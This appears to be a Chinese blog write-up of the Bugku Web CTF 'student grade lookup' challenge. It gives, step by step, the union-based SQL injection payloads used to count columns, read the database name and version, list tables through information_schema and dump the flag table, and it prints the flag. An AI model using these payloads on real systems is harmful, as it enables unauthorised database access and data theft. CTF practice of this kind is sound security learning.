Bugku Web CTF-学生成绩查询

本文详细解析了BugkuWebCTF平台上的学生成绩查询题目,通过SQL注入技巧,逐步猜解数据库结构,最终成功获取flag,展示了SQL注入攻击的实际操作流程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Bugku Web CTF-学生成绩查询

该题解题思路是SQL注入,测试思路如下:。
直接输入’单引号没有回显;
输入’#有回显;
通过union来猜解该表有多少列:

0' union select 1,2,3,4#

可正常回显,其余不行,猜测该表有4列,分别为id,Math,English,Chinese。
获取数据库名:

0' union select 1,user(),database(),version()#

可得到数据库名为skctf_flag
知道了数据库名,从中获取表名:

0' union select 1,2,3,(select table_name from information_schema.tables where table_schema='skctf_flag' limit 1)#

拿到一个名为fl4g的表,直接获取表中数据:

0' union select 1,2,3,(select * from fl4g)#

(恰好fl4g表只有一行一列数据所以该语句能成功执行)最终拿到flagBUGKU{Sql_INJECT0N_4813drd8hz4}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值